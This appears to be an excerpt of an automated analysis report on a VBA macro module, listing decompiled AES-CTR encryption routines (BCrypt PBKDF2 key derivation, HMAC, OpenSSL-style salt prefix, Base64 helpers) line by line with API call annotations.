          Private Declare PtrSafe Function BCryptFinishHash Lib "bcrypt" (ByVal hHash as LongPtr, pbOutput as Any, ByVal cbOutput as Long, ByVal dwFlags as Long) as Long

          36

          #else

          APIs | Meta Information

          vbNullString

          vbNullString

          AES_IVLEN

          UBound

          BCryptOpenAlgorithmProvider

          StrPtr

          KDF_HASH

          MS_PRIMITIVE_PROVIDER

          BCRYPT_ALG_HANDLE_HMAC_FLAG

          BCryptDeriveKeyPBKDF2

          pvArrayPtr

          pvArraySize

          KDF_ITER

          UBound

          BCryptOpenAlgorithmProvider

          StrPtr

          MS_PRIMITIVE_PROVIDER

          BCryptGetProperty

          StrPtr

          BCryptSetProperty

          StrPtr

          BCryptGenerateSymmetricKey

          CopyMemory

          AES_IVLEN

          BCryptOpenAlgorithmProvider

          StrPtr

          HMAC_HASH

          MS_PRIMITIVE_PROVIDER

          BCRYPT_ALG_HANDLE_HMAC_FLAG

          BCryptGetProperty

          StrPtr

          BCryptCreateHash

          AES_IVLEN

          LastError

          Part of subcall function GetSystemMessage@Module3: Space$

          Part of subcall function GetSystemMessage@Module3: FormatMessage

          Part of subcall function GetSystemMessage@Module3: FORMAT_MESSAGE_FROM_SYSTEM

          Part of subcall function GetSystemMessage@Module3: FORMAT_MESSAGE_IGNORE_INSERTS

          Part of subcall function GetSystemMessage@Module3: Len

          Part of subcall function GetSystemMessage@Module3: Mid$

          Part of subcall function GetSystemMessage@Module3: vbCrLf

          Part of subcall function GetSystemMessage@Module3: Left$

          Part of subcall function GetSystemMessage@Module3: Hex

          LastError

          ERR_UNSUPPORTED_ENCR

          Strings | Decrypted Strings
          "Microsoft Primitive Provider"
          "AES"
          "ObjectLength"
          "ChainingMode"
          "ChainingModeECB"
          "HashDigestLength"
          Line | Instruction | Meta Information
          299

          Private Function pvCryptoAesCtrInit(uCtx as UcsCryptoContextType, baPass() as Byte, baSalt() as Byte, baDerivedKey() as Byte, ByVal lKeyLen as Long) as Boolean

          300

          Const MS_PRIMITIVE_PROVIDER as String = "Microsoft Primitive Provider"

          301

          Const BCRYPT_ALG_HANDLE_HMAC_FLAG as Long = 8

          302

          Dim hResult as Long

          304

          With uCtx

          306

          . EncrData = vbNullString

          vbNullString

          307

          . EncrPos = 0

          308

          . LastError = vbNullString

          vbNullString

          309

          Redim Preserve baDerivedKey(0 To lKeyLen + AES_IVLEN - 1)

          AES_IVLEN

          310

          If UBound(baPass) >= 0 Or UBound(baSalt) >= 0 Then

          UBound

          312

          On Error Goto EH_Unsupported

          313

          hResult = BCryptOpenAlgorithmProvider(. hPbkdf2Alg, StrPtr(KDF_HASH), StrPtr(MS_PRIMITIVE_PROVIDER), BCRYPT_ALG_HANDLE_HMAC_FLAG)

          BCryptOpenAlgorithmProvider

          StrPtr

          KDF_HASH

          MS_PRIMITIVE_PROVIDER

          BCRYPT_ALG_HANDLE_HMAC_FLAG

          314

          If hResult < 0 Then

          315

          Goto QH

          316

          Endif

          317

          hResult = BCryptDeriveKeyPBKDF2(. hPbkdf2Alg, ByVal pvArrayPtr(baPass), pvArraySize(baPass), ByVal pvArrayPtr(baSalt), pvArraySize(baSalt), KDF_ITER / 10000@, baDerivedKey(0), UBound(baDerivedKey) + 1, 0)

          BCryptDeriveKeyPBKDF2

          pvArrayPtr

          pvArraySize

          KDF_ITER

          UBound

          319

          If hResult < 0 Then

          320

          Goto QH

          321

          Endif

          322

          On Error Goto 0

          323

          Endif

          325

          On Error Goto EH_Unsupported

          326

          hResult = BCryptOpenAlgorithmProvider(. hAesAlg, StrPtr("AES"), StrPtr(MS_PRIMITIVE_PROVIDER), 0)

          BCryptOpenAlgorithmProvider

          StrPtr

          MS_PRIMITIVE_PROVIDER

          327

          If hResult < 0 Then

          328

          Goto QH

          329

          Endif

          330

          On Error Goto 0

          331

          hResult = BCryptGetProperty(. hAesAlg, StrPtr("ObjectLength"), . AesKeyObjLen, 4, 0, 0)

          BCryptGetProperty

          StrPtr

          332

          If hResult < 0 Then

          333

          Goto QH

          334

          Endif

          335

          hResult = BCryptSetProperty(. hAesAlg, StrPtr("ChainingMode"), StrPtr("ChainingModeECB"), 30, 0)

          BCryptSetProperty

          StrPtr

          336

          If hResult < 0 Then

          337

          Goto QH

          338

          Endif

          339

          ReDim .AesKeyObjData(0 To .AesKeyObjLen - 1) As Byte ' BAD !

          340

          hResult = BCryptGenerateSymmetricKey(. hAesAlg, . hAesKey, . AesKeyObjData(0), . AesKeyObjLen, baDerivedKey(0), lKeyLen, 0)

          BCryptGenerateSymmetricKey

          341

          If hResult < 0 Then

          342

          Goto QH

          343

          Endif

          345

          Call CopyMemory(. Nonce(0), baDerivedKey(lKeyLen), AES_IVLEN)

          CopyMemory

          AES_IVLEN

          347

          hResult = BCryptOpenAlgorithmProvider(. hHmacAlg, StrPtr(HMAC_HASH), StrPtr(MS_PRIMITIVE_PROVIDER), BCRYPT_ALG_HANDLE_HMAC_FLAG)

          BCryptOpenAlgorithmProvider

          StrPtr

          HMAC_HASH

          MS_PRIMITIVE_PROVIDER

          BCRYPT_ALG_HANDLE_HMAC_FLAG

          348

          If hResult < 0 Then

          349

          Goto QH

          350

          Endif

          351

          hResult = BCryptGetProperty(. hHmacAlg, StrPtr("HashDigestLength"), . HashLen, 4, 0, 0)

          BCryptGetProperty

          StrPtr

          352

          If hResult < 0 Then

          353

          Goto QH

          354

          Endif

          355

          hResult = BCryptCreateHash(. hHmacAlg, . hHmacHash, 0, 0, baDerivedKey(lKeyLen + AES_IVLEN - . HashLen), . HashLen, 0)

          BCryptCreateHash

          AES_IVLEN

          356

          If hResult < 0 Then

          357

          Goto QH

          358

          Endif

          359

          End With

          361

          pvCryptoAesCtrInit = True

          362

          Exit Function

          362

          QH:

          364

          uCtx.LastError = GetSystemMessage(hResult)

          LastError

          365

          Exit Function

          365

          EH_Unsupported:

          367

          uCtx.LastError = ERR_UNSUPPORTED_ENCR

          LastError

          ERR_UNSUPPORTED_ENCR

          368

          End Function

          APIs | Meta Information

          IsArray

          IsMissing

          vbNullString

          IsArray

          Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

          Part of subcall function ToUtf8Array@Module3: CP_UTF8

          Part of subcall function ToUtf8Array@Module3: StrPtr

          Part of subcall function ToUtf8Array@Module3: Len

          Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

          Part of subcall function ToUtf8Array@Module3: CP_UTF8

          Part of subcall function ToUtf8Array@Module3: StrPtr

          Part of subcall function ToUtf8Array@Module3: Len

          Part of subcall function ToUtf8Array@Module3: vbNullString

          vbNullString

          IsMissing

          IsArray

          Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

          Part of subcall function ToUtf8Array@Module3: CP_UTF8

          Part of subcall function ToUtf8Array@Module3: StrPtr

          Part of subcall function ToUtf8Array@Module3: Len

          Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

          Part of subcall function ToUtf8Array@Module3: CP_UTF8

          Part of subcall function ToUtf8Array@Module3: StrPtr

          Part of subcall function ToUtf8Array@Module3: Len

          Part of subcall function ToUtf8Array@Module3: vbNullString

          vbNullString

          IsArray

          AES_KEYLEN

          Part of subcall function pvCryptoAesCtrInit@Module3: vbNullString

          Part of subcall function pvCryptoAesCtrInit@Module3: vbNullString

          Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN

          Part of subcall function pvCryptoAesCtrInit@Module3: UBound

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider

          Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

          Part of subcall function pvCryptoAesCtrInit@Module3: KDF_HASH

          Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER

          Part of subcall function pvCryptoAesCtrInit@Module3: BCRYPT_ALG_HANDLE_HMAC_FLAG

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptDeriveKeyPBKDF2

          Part of subcall function pvCryptoAesCtrInit@Module3: pvArrayPtr

          Part of subcall function pvCryptoAesCtrInit@Module3: pvArraySize

          Part of subcall function pvCryptoAesCtrInit@Module3: KDF_ITER

          Part of subcall function pvCryptoAesCtrInit@Module3: UBound

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider

          Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

          Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGetProperty

          Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptSetProperty

          Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGenerateSymmetricKey

          Part of subcall function pvCryptoAesCtrInit@Module3: CopyMemory

          Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider

          Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

          Part of subcall function pvCryptoAesCtrInit@Module3: HMAC_HASH

          Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER

          Part of subcall function pvCryptoAesCtrInit@Module3: BCRYPT_ALG_HANDLE_HMAC_FLAG

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGetProperty

          Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptCreateHash

          Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN

          Part of subcall function pvCryptoAesCtrInit@Module3: LastError

          Part of subcall function pvCryptoAesCtrInit@Module3: LastError

          Part of subcall function pvCryptoAesCtrInit@Module3: ERR_UNSUPPORTED_ENCR

          LastError

          Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArraySize

          Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptHashData

          Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArrayPtr

          Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE

          Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE

          Part of subcall function pvCryptoAesCtrCrypt@Module3: UBound

          Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE

          Part of subcall function pvCryptoAesCtrCrypt@Module3: CopyMemory

          Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE

          Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptEncrypt

          Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptHashData

          Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArrayPtr

          Part of subcall function pvCryptoAesCtrCrypt@Module3: LastError

          LastError

          IsArray

          Part of subcall function pvCryptoGetFinalHash@Module3: HashLen

          Part of subcall function pvCryptoGetFinalHash@Module3: BCryptFinishHash

          Part of subcall function pvCryptoGetFinalHash@Module3: hHmacHash

          Part of subcall function pvCryptoGetFinalHash@Module3: HashLen

          UBound

          Part of subcall function PeekPtr@Module3: CopyMemory

          Part of subcall function PeekPtr@Module3: PTR_SIZE

          VarPtr

          Part of subcall function PeekPtr@Module3: CopyMemory

          Part of subcall function PeekPtr@Module3: PTR_SIZE

          VarPtr

          Part of subcall function PeekPtr@Module3: CopyMemory

          Part of subcall function PeekPtr@Module3: PTR_SIZE

          VarPtr

          VT_BYREF

          Part of subcall function PeekPtr@Module3: CopyMemory

          Part of subcall function PeekPtr@Module3: PTR_SIZE

          Part of subcall function PeekPtr@Module3: CopyMemory

          Part of subcall function PeekPtr@Module3: PTR_SIZE

          Part of subcall function PeekPtr@Module3: CopyMemory

          Part of subcall function PeekPtr@Module3: PTR_SIZE

          CopyMemory

          UBound

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyHash

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyKey

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

          Array

          Number

          Err

          Source

          Description

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyHash

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyKey

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

          Raise

          Line | Instruction | Meta Information
          186

          Public Function AesCryptArray(baData() as Byte, optional Password as Variant, optional Salt as Variant, optional key as Variant, optional ByVal KeyLen as Long, optional Error as String, optional Hmac as Variant) as Boolean

          194

          Const VT_BYREF as Long = &H4000

          195

          Dim uCtx as UcsCryptoContextType

          196

          Dim vErr as Variant

          197

          Dim bHashBefore as Boolean

          198

          Dim bHashAfter as Boolean

          199

          Dim baPass() as Byte

          200

          Dim baSalt() as Byte

          201

          Dim baKey() as Byte

          202

          Dim baTemp() as Byte

          203

          Dim lPtr as LongPtr

          205

          On Error Goto EH

          206

          If IsArray(Hmac) Then

          IsArray

          207

          bHashBefore = (Hmac(0) <= 0)

          208

          bHashAfter = (Hmac(0) > 0)

          209

          Endif

          210

          If IsMissing(Password) Then

          IsMissing

          211

          baPass = vbNullString

          vbNullString

          212

          Elseif IsArray(Password) Then

          IsArray

          213

          baPass = Password

          214

          Else

          215

          baPass = ToUtf8Array(Password & vbNullString)

          vbNullString

          216

          Endif

          217

          If IsMissing(Salt) Then

          IsMissing

          218

          baSalt = baPass

          219

          Elseif IsArray(Salt) Then

          IsArray

          220

          baSalt = Salt

          221

          Else

          222

          baSalt = ToUtf8Array(Salt & vbNullString)

          vbNullString

          223

          Endif

          224

          If IsArray(key) Then

          IsArray

          225

          baKey = key

          226

          Endif

          227

          If KeyLen <= 0 Then

          228

          KeyLen = AES_KEYLEN

          AES_KEYLEN

          229

          Endif

          230

          If Not pvCryptoAesCtrInit(uCtx, baPass, baSalt, baKey, KeyLen) Then

          231

          Error = uCtx.LastError

          LastError

          232

          Goto QH

          233

          Endif

          234

          If Not pvCryptoAesCtrCrypt(uCtx, baData, HashBefore := bHashBefore, HashAfter := bHashAfter) Then

          235

          Error = uCtx.LastError

          LastError

          236

          Goto QH

          237

          Endif

          238

          If IsArray(Hmac) Then

          IsArray

          239

          baTemp = pvCryptoGetFinalHash(uCtx, UBound(Hmac) + 1)

          UBound

          240

          #if Win64 then

          241

          lPtr = PeekPtr(VarPtr(Hmac) + 8)

          VarPtr

          242

          #else

          243

          lPtr = PeekPtr((VarPtr(Hmac) Xor &H80000000) + 8 Xor &H80000000)

          VarPtr

          244

          #endif

          245

          If (PeekPtr(VarPtr(Hmac)) And VT_BYREF) <> 0 Then

          VarPtr

          VT_BYREF

          246

          lPtr = PeekPtr(lPtr)

          247

          Endif

          248

          #if Win64 then

          249

          lPtr = PeekPtr(lPtr + 16)

          250

          #else

          251

          lPtr = PeekPtr((lPtr Xor &H80000000) + 12 Xor &H80000000)

          252

          #endif

          253

          Call CopyMemory(ByVal lPtr, baTemp(0), UBound(baTemp) + 1)

          CopyMemory

          UBound

          254

          Endif

          256

          AesCryptArray = True

          256

          QH:

          258

          pvCryptoAesCtrTerminate uCtx

          259

          Exit Function

          259

          EH:

          261

          vErr = Array(Err.Number, Err.Source, Err.Description)

          Array

          Number

          Err

          Source

          Description

          262

          pvCryptoAesCtrTerminate uCtx

          263

          Err.Raise vErr(0), vErr(1), vErr(2)

          Raise

          264

          End Function

          APIs | Meta Information

          OPENSSL_MAGICLEN

          KDF_SALTLEN

          Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

          Part of subcall function ToUtf8Array@Module3: CP_UTF8

          Part of subcall function ToUtf8Array@Module3: StrPtr

          Part of subcall function ToUtf8Array@Module3: Len

          Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

          Part of subcall function ToUtf8Array@Module3: CP_UTF8

          Part of subcall function ToUtf8Array@Module3: StrPtr

          Part of subcall function ToUtf8Array@Module3: Len

          Part of subcall function ToUtf8Array@Module3: vbNullString

          vbNullString

          vbNullString

          IsArray

          IsMissing

          Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

          Part of subcall function ToUtf8Array@Module3: CP_UTF8

          Part of subcall function ToUtf8Array@Module3: StrPtr

          Part of subcall function ToUtf8Array@Module3: Len

          Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

          Part of subcall function ToUtf8Array@Module3: CP_UTF8

          Part of subcall function ToUtf8Array@Module3: StrPtr

          Part of subcall function ToUtf8Array@Module3: Len

          Part of subcall function ToUtf8Array@Module3: vbNullString

          vbNullString

          KDF_SALTLEN

          RtlGenRandom

          KDF_SALTLEN

          Part of subcall function AesCryptArray@Module3: IsArray

          Part of subcall function AesCryptArray@Module3: IsMissing

          Part of subcall function AesCryptArray@Module3: vbNullString

          Part of subcall function AesCryptArray@Module3: IsArray

          Part of subcall function AesCryptArray@Module3: vbNullString

          Part of subcall function AesCryptArray@Module3: IsMissing

          Part of subcall function AesCryptArray@Module3: IsArray

          Part of subcall function AesCryptArray@Module3: vbNullString

          Part of subcall function AesCryptArray@Module3: IsArray

          Part of subcall function AesCryptArray@Module3: AES_KEYLEN

          Part of subcall function AesCryptArray@Module3: LastError

          Part of subcall function AesCryptArray@Module3: LastError

          Part of subcall function AesCryptArray@Module3: IsArray

          Part of subcall function AesCryptArray@Module3: UBound

          Part of subcall function AesCryptArray@Module3: VarPtr

          Part of subcall function AesCryptArray@Module3: VarPtr

          Part of subcall function AesCryptArray@Module3: VarPtr

          Part of subcall function AesCryptArray@Module3: VT_BYREF

          Part of subcall function AesCryptArray@Module3: CopyMemory

          Part of subcall function AesCryptArray@Module3: UBound

          Part of subcall function AesCryptArray@Module3: Array

          Part of subcall function AesCryptArray@Module3: Number

          Part of subcall function AesCryptArray@Module3: Err

          Part of subcall function AesCryptArray@Module3: Source

          Part of subcall function AesCryptArray@Module3: Description

          Part of subcall function AesCryptArray@Module3: Raise

          Raise

          vbObjectError

          IsArray

          UBound

          PREFIXLEN

          UBound

          PREFIXLEN

          CopyMemory

          PREFIXLEN

          UBound

          CopyMemory

          OPENSSL_MAGICLEN

          KDF_SALTLEN

          CopyMemory

          OPENSSL_MAGIC

          OPENSSL_MAGICLEN

          Replace

          Part of subcall function ToBase64Array@Module3: UBound

          Part of subcall function ToBase64Array@Module3: String$

          Part of subcall function ToBase64Array@Module3: UBound

          Part of subcall function ToBase64Array@Module3: Len

          Part of subcall function ToBase64Array@Module3: CryptBinaryToString

          Part of subcall function ToBase64Array@Module3: VarPtr

          Part of subcall function ToBase64Array@Module3: UBound

          Part of subcall function ToBase64Array@Module3: CRYPT_STRING_BASE64

          Part of subcall function ToBase64Array@Module3: StrPtr

          Part of subcall function ToBase64Array@Module3: Left$

          vbCrLf

          vbNullString

          Line | Instruction | Meta Information
          112

          Public Function AesEncryptString(sText as String, optional Password as Variant) as String

          113

          Const PREFIXLEN as Long = OPENSSL_MAGICLEN + KDF_SALTLEN

          OPENSSL_MAGICLEN

          KDF_SALTLEN

          114

          Dim baData() as Byte

          115

          Dim baPass() as Byte

          116

          Dim baSalt() as Byte

          117 | Dim baKey() as Byte |
          118 | Dim sError as String |
          120 | baData = ToUtf8Array(sText) |
          121 | baPass = vbNullString | vbNullString
          122 | baSalt = vbNullString | vbNullString
          123 | If Not IsArray(Password) Then | IsArray
          124 | If Not IsMissing(Password) Then | IsMissing
          125 | baPass = ToUtf8Array(Password & vbNullString) | vbNullString
          126 | Endif |
          127 | Redim baSalt(0 To KDF_SALTLEN - 1) | KDF_SALTLEN
          128 | Call RtlGenRandom(baSalt(0), KDF_SALTLEN) | RtlGenRandom, KDF_SALTLEN
          129 | Else |
          130 | baKey = Password |
          131 | Endif |
          132 | If Not AesCryptArray(baData, baPass, baSalt, baKey, Error := sError) Then |
          133 | Err.Raise vbObjectError, , sError | Raise, vbObjectError
          134 | Endif |
          135 | If Not IsArray(Password) Then | IsArray
          136 | Redim Preserve baData(0 To UBound(baData) + PREFIXLEN) | UBound, PREFIXLEN
          137 | If UBound(baData) >= PREFIXLEN Then | UBound, PREFIXLEN
          138 | Call CopyMemory(baData(PREFIXLEN), baData(0), UBound(baData) + 1 - PREFIXLEN) | CopyMemory, PREFIXLEN, UBound
          139 | Endif |
          140 | Call CopyMemory(baData(OPENSSL_MAGICLEN), baSalt(0), KDF_SALTLEN) | CopyMemory, OPENSSL_MAGICLEN, KDF_SALTLEN
          141 | Call CopyMemory(baData(0), ByVal OPENSSL_MAGIC, OPENSSL_MAGICLEN) | CopyMemory, OPENSSL_MAGIC, OPENSSL_MAGICLEN
          142 | Endif |
          143 | AesEncryptString = Replace(ToBase64Array(baData), vbCrLf, vbNullString) | Replace, vbCrLf, vbNullString
          144 | End Function |

          APIs | Meta Information

          OPENSSL_MAGICLEN

          KDF_SALTLEN

          Part of subcall function FromBase64Array@Module3: Len

          Part of subcall function FromBase64Array@Module3: CryptStringToBinary

          Part of subcall function FromBase64Array@Module3: StrPtr

          Part of subcall function FromBase64Array@Module3: Len

          Part of subcall function FromBase64Array@Module3: CRYPT_STRING_BASE64

          Part of subcall function FromBase64Array@Module3: VarPtr

          Part of subcall function FromBase64Array@Module3: vbNullString

          vbNullString

          vbNullString

          IsArray

          IsMissing

          Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

          Part of subcall function ToUtf8Array@Module3: CP_UTF8

          Part of subcall function ToUtf8Array@Module3: StrPtr

          Part of subcall function ToUtf8Array@Module3: Len

          Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

          Part of subcall function ToUtf8Array@Module3: CP_UTF8

          Part of subcall function ToUtf8Array@Module3: StrPtr

          Part of subcall function ToUtf8Array@Module3: Len

          Part of subcall function ToUtf8Array@Module3: vbNullString

          vbNullString

          UBound

          PREFIXLEN

          String$

          OPENSSL_MAGICLEN

          CopyMemory

          OPENSSL_MAGICLEN

          OPENSSL_MAGIC

          KDF_SALTLEN

          CopyMemory

          OPENSSL_MAGICLEN

          KDF_SALTLEN

          UBound

          PREFIXLEN

          CopyMemory

          PREFIXLEN

          UBound

          UBound

          PREFIXLEN

          vbNullString

          Part of subcall function AesCryptArray@Module3: IsArray

          Part of subcall function AesCryptArray@Module3: IsMissing

          Part of subcall function AesCryptArray@Module3: vbNullString

          Part of subcall function AesCryptArray@Module3: IsArray

          Part of subcall function AesCryptArray@Module3: vbNullString

          Part of subcall function AesCryptArray@Module3: IsMissing

          Part of subcall function AesCryptArray@Module3: IsArray

          Part of subcall function AesCryptArray@Module3: vbNullString

          Part of subcall function AesCryptArray@Module3: IsArray

          Part of subcall function AesCryptArray@Module3: AES_KEYLEN

          Part of subcall function AesCryptArray@Module3: LastError

          Part of subcall function AesCryptArray@Module3: LastError

          Part of subcall function AesCryptArray@Module3: IsArray

          Part of subcall function AesCryptArray@Module3: UBound

          Part of subcall function AesCryptArray@Module3: VarPtr

          Part of subcall function AesCryptArray@Module3: VarPtr

          Part of subcall function AesCryptArray@Module3: VarPtr

          Part of subcall function AesCryptArray@Module3: VT_BYREF

          Part of subcall function AesCryptArray@Module3: CopyMemory

          Part of subcall function AesCryptArray@Module3: UBound

          Part of subcall function AesCryptArray@Module3: Array

          Part of subcall function AesCryptArray@Module3: Number

          Part of subcall function AesCryptArray@Module3: Err

          Part of subcall function AesCryptArray@Module3: Source

          Part of subcall function AesCryptArray@Module3: Description

          Part of subcall function AesCryptArray@Module3: Raise

          Raise

          vbObjectError

          Part of subcall function FromUtf8Array@Module3: UBound

          Part of subcall function FromUtf8Array@Module3: String$

          Part of subcall function FromUtf8Array@Module3: UBound

          Part of subcall function FromUtf8Array@Module3: MultiByteToWideChar

          Part of subcall function FromUtf8Array@Module3: CP_UTF8

          Part of subcall function FromUtf8Array@Module3: UBound

          Part of subcall function FromUtf8Array@Module3: StrPtr

          Part of subcall function FromUtf8Array@Module3: Len

          Part of subcall function FromUtf8Array@Module3: Left$

          Line | Instruction | Meta Information
          147 | Public Function AesDecryptString(sEncr as String, optional Password as Variant) as String |
          148 | Const PREFIXLEN as Long = OPENSSL_MAGICLEN + KDF_SALTLEN | OPENSSL_MAGICLEN, KDF_SALTLEN
          149 | Dim baData() as Byte |
          150 | Dim baPass() as Byte |
          151 | Dim baSalt() as Byte |
          152 | Dim baKey() as Byte |
          153 | Dim sMagic as String |
          154 | Dim sError as String |
          156 | baData = FromBase64Array(sEncr) |
          157 | baPass = vbNullString | vbNullString
          158 | baSalt = vbNullString | vbNullString
          159 | If Not IsArray(Password) Then | IsArray
          160 | If Not IsMissing(Password) Then | IsMissing
          161 | baPass = ToUtf8Array(Password & vbNullString) | vbNullString
          162 | Endif |
          163 | If UBound(baData) >= PREFIXLEN - 1 Then | UBound, PREFIXLEN
          164 | sMagic = String$(OPENSSL_MAGICLEN, 0) | String$, OPENSSL_MAGICLEN
          165 | Call CopyMemory(ByVal sMagic, baData(0), OPENSSL_MAGICLEN) | CopyMemory, OPENSSL_MAGICLEN
          166 | If sMagic = OPENSSL_MAGIC Then | OPENSSL_MAGIC
          167 | Redim baSalt(0 To KDF_SALTLEN - 1) | KDF_SALTLEN
          168 | Call CopyMemory(baSalt(0), baData(OPENSSL_MAGICLEN), KDF_SALTLEN) | CopyMemory, OPENSSL_MAGICLEN, KDF_SALTLEN
          169 | If UBound(baData) >= PREFIXLEN Then | UBound, PREFIXLEN
          170 | Call CopyMemory(baData(0), baData(PREFIXLEN), UBound(baData) + 1 - PREFIXLEN) | CopyMemory, PREFIXLEN, UBound
          171 | Redim Preserve baData(0 To UBound(baData) - PREFIXLEN) | UBound, PREFIXLEN
          172 | Else |
          173 | baData = vbNullString | vbNullString
          174 | Endif |
          175 | Endif |
          176 | Endif |
          177 | Else |
          178 | baKey = Password |
          179 | Endif |
          180 | If Not AesCryptArray(baData, baPass, baSalt, baKey, Error := sError) Then |
          181 | Err.Raise vbObjectError, , sError | Raise, vbObjectError
          182 | Endif |
          183 | AesDecryptString = FromUtf8Array(baData) |
          184 | End Function |

          APIs | Meta Information

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyHash

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyKey

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

          m_uChunkedCtx

          vbNullString

          IsArray

          AES_KEYLEN

          Part of subcall function pvCryptoAesCtrInit@Module3: vbNullString

          Part of subcall function pvCryptoAesCtrInit@Module3: vbNullString

          Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN

          Part of subcall function pvCryptoAesCtrInit@Module3: UBound

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider

          Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

          Part of subcall function pvCryptoAesCtrInit@Module3: KDF_HASH

          Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER

          Part of subcall function pvCryptoAesCtrInit@Module3: BCRYPT_ALG_HANDLE_HMAC_FLAG

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptDeriveKeyPBKDF2

          Part of subcall function pvCryptoAesCtrInit@Module3: pvArrayPtr

          Part of subcall function pvCryptoAesCtrInit@Module3: pvArraySize

          Part of subcall function pvCryptoAesCtrInit@Module3: KDF_ITER

          Part of subcall function pvCryptoAesCtrInit@Module3: UBound

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider

          Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

          Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGetProperty

          Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptSetProperty

          Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGenerateSymmetricKey

          Part of subcall function pvCryptoAesCtrInit@Module3: CopyMemory

          Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider

          Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

          Part of subcall function pvCryptoAesCtrInit@Module3: HMAC_HASH

          Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER

          Part of subcall function pvCryptoAesCtrInit@Module3: BCRYPT_ALG_HANDLE_HMAC_FLAG

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGetProperty

          Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptCreateHash

          Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN

          Part of subcall function pvCryptoAesCtrInit@Module3: LastError

          Part of subcall function pvCryptoAesCtrInit@Module3: LastError

          Part of subcall function pvCryptoAesCtrInit@Module3: ERR_UNSUPPORTED_ENCR

          m_uChunkedCtx

          Line | Instruction | Meta Information
          266 | Public Function AesChunkedInit(optional key as Variant, optional ByVal KeyLen as Long) as Boolean |
          267 | Dim baEmpty() as Byte |
          268 | Dim baKey() as Byte |
          270 | pvCryptoAesCtrTerminate m_uChunkedCtx | m_uChunkedCtx
